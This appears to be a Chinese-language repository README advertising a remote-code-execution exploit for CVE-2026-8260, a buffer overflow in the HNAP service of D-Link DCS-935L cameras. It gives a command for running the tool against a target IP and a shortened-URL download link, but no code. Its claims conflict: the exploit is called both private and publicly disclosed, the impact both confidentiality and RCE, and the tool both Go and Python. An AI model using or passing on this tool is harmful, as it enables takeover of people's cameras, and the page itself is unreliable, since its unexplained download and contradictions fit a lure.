CryptReaper12/CVE-2026-8260

# CVE-2026-8260 ## 概述 运行固件版本 1.10.01 及之前版本的 D-Link DCS-935L 摄像头型号存在缓冲区溢出漏洞。 ## 详情 - **CVE ID**: [CVE-2026-8260](https://nvd.nist.gov/vuln/detail/CVE-2026-8260) - **发现日期**: 2026-05-11 - **发布日期**: 2026-05-11 - **影响**: 机密性 - **漏洞利用可用性**: 未公开，仅限私下使用。 ## 漏洞描述 该漏洞存在于 /web/cgi-bin/hnap/hnap_service 的 HNAP Service 的 SetDeviceSettings 函数中。此漏洞允许攻击者篡改 AdminPassword 参数，进而可能导致远程代码执行。目前已有漏洞利用被公开披露，对受影响设备的用户构成了重大风险。 ## 受影响版本 ## 运行 运行此漏洞利用需要 Python 3.9。 执行： ``` python exploit.py -h 10.10.10.10 -c 'uname -a' ``` ## 漏洞利用： ### [在此下载](https://tinyurl.com/yv89jhtm)

标签：0day漏洞, AdminPassword, CISA项目, CVE-2026-8260, DCS-935L, D-Link, Exploit, Go语言工具, HNAP协议, IoT安全, Python, RCE, SetDeviceSettings, 固件漏洞, 无后门, 智能设备安全, 私有漏洞利用, 缓冲区溢出, 编程工具, 网络安全, 网络摄像头, 远程代码执行, 逆向工具, 隐私保护